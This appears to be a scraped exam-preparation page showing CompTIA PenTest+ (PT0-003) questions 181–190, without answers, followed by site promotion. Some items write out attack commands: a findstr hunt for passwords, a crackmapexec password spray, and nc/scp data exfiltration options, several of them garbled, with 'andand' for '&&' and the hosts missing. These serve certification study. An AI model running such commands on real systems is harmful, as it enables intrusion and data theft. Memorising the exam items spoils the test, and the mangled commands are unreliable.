Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :271 Q&As
  • Last Updated
    :Mar 30, 2025

CompTIA CompTIA Certifications PT0-003 Questions & Answers

  • Question 181:

    During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?

    A. Nikto

    B. Burp Suite

    C. smbclient

    D. theHarvester

  • Question 182:

    A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

    A. schtasks.exe

    B. rundll.exe

    C. cmd.exe

    D. chgusr.exe

    E. sc.exe

    F. netsh.exe

  • Question 183:

    During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command: findstr /SIM /C:"pass" *.txt *.cfg *.xml

    Which of the following is the penetration tester trying to enumerate?

    A. Configuration files

    B. Permissions

    C. Virtual hosts

    D. Secrets

  • Question 184:

    A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:

    Action | SRC

    | DEST

    | -

    Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP

    Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCP

    Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCP Block | . | . | *

    Which of the following commands should the tester try next?

    A. tar -zcvf /tmp/data.tar.gz /path/to/data andand nc -w 3 443 < /tmp/data.tar.gz

    B. gzip /path/to/data andand cp data.gz 443

    C. gzip /path/to/data andand nc -nvlk 443; cat data.gz ' nc -w 3 22

    D. tar -zcvf /tmp/data.tar.gz /path/to/data andand scp /tmp/data.tar.gz

  • Question 185:

    Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

    A. Preserving artifacts

    B. Reverting configuration changes

    C. Keeping chain of custody

    D. Exporting credential data

  • Question 186:

    While performing an internal assessment, a tester uses the following command:

    crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@

    Which of the following is the main purpose of the command?

    A. To perform a pass-the-hash attack over multiple endpoints within the internal network

    B. To perform common protocol scanning within the internal network

    C. To perform password spraying on internal systems

    D. To execute a command in multiple endpoints at the same time

  • Question 187:

    A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?

    A. Enable monitoring mode using Aircrack-ng.

    B. Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.

    C. Run KARMA to break the password.

    D. Research WiGLE.net for potential nearby client access points.

  • Question 188:

    During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?

    A. On-path

    B. Logic bomb

    C. Rootkit

    D. Buffer overflow

  • Question 189:

    A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?

    A. OWASP MASVS

    B. OSSTMM

    C. MITRE ATTandCK

    D. CREST

  • Question 190:

    A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?

    A. A generative AI assistant

    B. The customer's designated contact

    C. A cybersecurity industry peer

    D. A team member

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.